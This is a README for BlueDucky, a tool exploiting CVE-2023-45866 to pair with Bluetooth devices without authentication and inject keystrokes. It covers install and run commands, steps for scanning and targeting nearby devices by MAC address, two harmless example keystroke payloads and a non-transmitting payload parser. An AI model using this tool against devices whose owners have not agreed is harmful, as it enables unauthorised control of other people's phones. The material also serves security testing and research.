# BlueDucky (Android) 🦆
🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)
🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)
[This is an implementation of the CVE discovered by marcnewlin](https://github.com/marcnewlin/hi_my_name_is_keyboard)
<p align="center">
<img src="./images/start.png">
</p>
## Introduction 📢
BlueDucky is a tool for exploiting CVE-2023-45866, an unauthenticated HID (keyboard) pairing vulnerability in Bluetooth hosts. By running this script, you can:
1. 📡 Load saved Bluetooth devices that are no longer visible but have Bluetooth still enabled.
2. 📂 Automatically save any devices you scan.
3. 💌 Send keystroke payloads written in DuckyScript format to interact with the connected device.
I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.
## Installation and Usage 🛠️
### Setup Instructions
```bash
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
```
## Running BlueDucky
```bash
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
python3 BlueDucky.py
```
## Operational Steps 🕹️
1. On startup, the script prompts for the target MAC address.
2. Leaving the prompt empty triggers an automatic scan for devices.
3. Devices found during a scan are stored in known_devices.txt.
4. If known_devices.txt already exists, the script checks it before scanning.
5. The keystrokes are read from the payload.txt file.
6. On success, the script connects to the target automatically and runs the payload.
## Duckyscript 💻
🚧 Work in Progress:
- Figuring out the best way to handle DELAY formatting in DuckyScript, as we need to send keyboard release signals constantly to keep the connection stable.
#### 📝 Example payload.txt:
```text
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+ \|[{]}; :'",< . > /?
GUI D
```
A second example payload:
```bash
DELAY 500
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
ALT d
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300
```
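The payload format above is simple enough to be parsed and reviewed before anything is run. The following is an added example, not BlueDucky's own parser: it turns a payload.txt into structured commands, rejects malformed lines (non-numeric DELAY, modifiers without a key, unknown key names), and summarises what the payload would type and how long it would pause. It transmits nothing. The keyword tables (MODIFIERS, SPECIAL_KEYS) are assumptions for the example; the PRIVATE_BROWSER alias follows the README's own comment, and the sample input is the README's second example payload.

```python
"""Structural parser for DuckyScript payload files (added example).

Useful for reviewing a payload.txt before use or when analysing one found on a
device: every line becomes a Command record, malformed lines raise PayloadError.
Not BlueDucky's code; the keyword tables below are assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumed keyword tables; a real DuckyScript interpreter may accept more.
MODIFIERS = {"CTRL", "CONTROL", "SHIFT", "ALT", "GUI", "WINDOWS", "COMMAND"}
SPECIAL_KEYS = {"ENTER", "ESCAPE", "ESC", "TAB", "SPACE", "BACKSPACE", "DELETE",
                "UP", "DOWN", "LEFT", "RIGHT", "HOME", "END", "PAGEUP", "PAGEDOWN",
                "CAPSLOCK", "PRINTSCREEN", "MENU", "APP"}
# PRIVATE_BROWSER = CTRL + SHIFT + N, as the README's payload comment states.
ALIASES = {"PRIVATE_BROWSER": ("CTRL", "SHIFT", "n")}


@dataclass
class Command:
    kind: str                      # "REM", "STRING", "DELAY" or "KEY"
    line_no: int                   # 1-based line in the payload file
    text: str = ""                 # REM / STRING payload
    delay_ms: int = 0              # DELAY argument in milliseconds
    modifiers: List[str] = field(default_factory=list)   # KEY modifiers
    key: Optional[str] = None      # KEY final key token


class PayloadError(ValueError):
    """Raised for a line the parser cannot interpret; the message names the line."""


def parse_line(line_no: int, raw: str) -> Optional[Command]:
    line = raw.rstrip("\r\n")
    if not line.strip():
        return None                                   # blank lines are ignored
    word, _, rest = line.partition(" ")
    keyword = word.upper()
    if keyword == "REM":                              # comment, never typed
        return Command("REM", line_no, text=rest)
    if keyword == "STRING":                           # typed verbatim, spaces kept
        if not rest:
            raise PayloadError(f"line {line_no}: STRING without text")
        return Command("STRING", line_no, text=rest)
    if keyword == "DELAY":                            # pause in milliseconds
        if not rest.strip().isdigit():
            raise PayloadError(f"line {line_no}: DELAY needs a whole number of ms")
        return Command("DELAY", line_no, delay_ms=int(rest))
    if keyword in ALIASES:                            # expand alias to a combo
        *mods, key = ALIASES[keyword]
        return Command("KEY", line_no, modifiers=mods, key=key)
    # Otherwise: zero or more modifiers followed by exactly one key token.
    tokens = line.split()
    mods: List[str] = []
    for tok in tokens[:-1]:
        if tok.upper() not in MODIFIERS:
            raise PayloadError(f"line {line_no}: unknown modifier {tok!r}")
        mods.append(tok.upper())
    key = tokens[-1]
    if key.upper() in MODIFIERS:
        raise PayloadError(f"line {line_no}: modifiers without a key")
    if len(key) != 1 and key.upper() not in SPECIAL_KEYS:
        raise PayloadError(f"line {line_no}: unknown key {key!r}")
    return Command("KEY", line_no, modifiers=mods,
                   key=key if len(key) == 1 else key.upper())


def parse_payload(text: str) -> List[Command]:
    """Parse a whole payload file; raises PayloadError on the first bad line."""
    commands = []
    for n, raw in enumerate(text.splitlines(), start=1):
        cmd = parse_line(n, raw)
        if cmd is not None:
            commands.append(cmd)
    return commands


def summarize(commands: List[Command]) -> Dict[str, object]:
    """What a reviewer wants to know: total pause, text typed, key combos used."""
    return {
        "delay_ms": sum(c.delay_ms for c in commands if c.kind == "DELAY"),
        "typed": "".join(c.text for c in commands if c.kind == "STRING"),
        "combos": ["+".join(c.modifiers + [c.key]) for c in commands if c.kind == "KEY"],
    }


# Sample input: the README's second example payload.
EXAMPLE_PAYLOAD = """\
DELAY 500
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
ALT d
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300
"""

if __name__ == "__main__":
    for c in parse_payload(EXAMPLE_PAYLOAD):
        print(c)
    print(summarize(parse_payload(EXAMPLE_PAYLOAD)))
```

Running the file prints each parsed command and a summary showing 2800 ms of total delay, the single typed string "hackertyper.net", and the eight key combinations the payload sends; a payload with a typo such as `DELAY soon` fails with a line-numbered PayloadError instead of being silently skipped.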
## Enjoy experimenting with BlueDucky! 🌟